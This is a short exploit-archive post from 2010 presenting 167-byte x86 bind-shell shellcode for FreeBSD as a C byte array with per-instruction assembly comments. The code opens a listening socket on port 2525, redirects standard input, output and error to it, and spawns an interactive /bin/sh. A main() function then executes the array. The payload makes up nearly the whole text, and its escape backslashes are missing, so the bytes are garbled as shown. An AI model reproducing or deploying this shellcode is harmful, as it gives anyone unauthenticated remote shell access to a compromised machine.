bds/x86-bindshell on port 2525 shellcode 167 bytes
Posted on 23 April 2010
================================================== bds/x86-bindshell on port 2525 shellcode 167 bytes ================================================== /* -------------- bds/x86-bindshell on port 2525 167 bytes ------------------------- * AUTHOR : beosroot * OS : BSDx86 (Tested on FreeBSD) * EMAIL : beosroot@hotmail.fr beosroot@null.net * GR33TZ To : joseph-h, str0ke, MHIDO55,..... */ const char shellcode[] = "x6ax00" // push $0x0 "x6ax01" // push $0x1 "x6ax02" // push $0x2 "x50" // push %eax "x6ax61" // push $0x61 "x58" // pop %eax "xcdx80" // int $0x80 "x50" // push %eax "x6ax00" // push $0x0 "x6ax00" // push $0x0 "x6ax00" // push $0x0 "x6ax00" // push $0x0 "x68x10x02x09xdd" // push $0xdd090210 "x89xe0" // mov %esp,%eax "x6ax10" // push $0x10 "x50" // push %eax "xffx74x24x1c" // pushl 0x1c %esp "x50" // push %eax "x6ax68" // push $0x68 "x58" // pop $eax "xcdx80" // int $0x80 "x6ax01" // push $0x1 "xffx74x24x28" // pushl 0x28 %esp "x50" // push %eax "x6ax6a" // push $0x6a "x58" // pop $eax "xcdx80" // int $0x80 "x83xecx10" // sub $0x10,$esp "x6ax10" // push $0x10 "x8dx44x24x04" // lea 0x4%esp,%eax "x89xe1" // mov %esp,%ecx "x51" // push %ecx "x50" // push %eax "xffx74x24x4c" // pushl 0x4c %esp "x50" // push %eax "x6ax1e" // push %0x1e "x58" // pop %eax "xcdx80" // int $0x80 "x50" // push %eax "xffx74x24x58" // pushl 0x58 %esp "x50" // push %eax "x6ax06" // push $0x6 "x58" // pop %eax "xcdx80" // int $0x80 "x6ax00" // push $0x0 "xffx74x24x0c" // pushl 0xc %esp "x50" // push %eax "x6ax5a" // push $0x5a "x58" // pop %eax "xcdx80" // int $0x80 "x6ax01" // push $0x1 "xffx74x24x18" // pushl 0x18 %esp "x50" // push %eax "x6ax5a" // push $0x5a "x58" // pop %eax "xcdx80" // int $0x80 "x6ax02" // push $0x2 "xffx74x24x24" // pushl 0x24 %esp "x50" // push %eax "x6ax5a" // push $0x5a "x58" // pop %eax "xcdx80" // int $0x80 "x68x73x68x00x00" // push $0x6873 "x89xe0" // mov %esp,%eax "x68x2dx69x00x00" // push $0x692d "x89xe1" // mov %esp,%ecx "x6ax00" // push $0x0 "x51" // push %ecx "x50" // push %eax "x68x2fx73x68x00" // push $0x68732f "x68x2fx62x69x6e" // push $0x6e69622f "x89xe0" // mov %esp,%eax "x8dx4cx24x08" // lea 0x8 %esp,%ecx "x6ax00" // push $0x0 "x51" // push %ecx "x50" // push %eax "x50" // push %eax "x6ax3b" // push $0x3b "x58" // pop %eax "xcdx80"; // int $0x80 int main() { void (*hell)() = (void *)shellcode; return (*(int(*)())shellcode)(); } // the end o.O ] # Inj3ct0r.com [2010-04-23]
